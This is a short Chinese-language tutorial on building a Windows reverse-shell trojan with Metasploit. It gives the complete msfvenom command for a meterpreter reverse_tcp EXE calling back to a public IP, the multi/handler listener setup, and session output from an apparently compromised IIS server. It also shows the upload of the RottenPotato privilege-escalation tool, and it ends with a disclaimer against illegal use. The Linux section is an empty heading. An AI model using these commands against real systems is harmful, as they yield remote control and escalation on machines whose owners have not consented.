1. 程式人生 > 實用技巧 >利用Metasploit反彈shell

利用Metasploit反彈shell

msf製作windows-shell

1 .製作反彈shell-exe檔案

msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe
//LHOST為公網IP
//LPORT為反彈埠
//4433.exe為生成檔案

2.控制端啟動msfconsole,獲取監聽

msfconsle
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153
msf5 exploit(multi/handler) > set LPORT 4433
msf5 exploit(multi/handler) > run

3.反彈成功

meterpreter > sysinfo
Computer        : WIN-UKKED2CCSHJ
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows

meterpreter > getuid
Server username: IIS APPPOOL\padt002

4、上傳檔案

meterpreter > upload /root/RottenPotato/rottenpotato.exe
[*] uploading  : /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
[*] Uploaded 664.00 KiB of 664.00 KiB (100.0%): /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
[*] uploaded   : /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe

msf製作linux-shell

參考連結

csdn-利用Metasploit獲取linux反彈shell的嘗試
csdn-MSF生成windows木馬

宣告

嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 後果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合!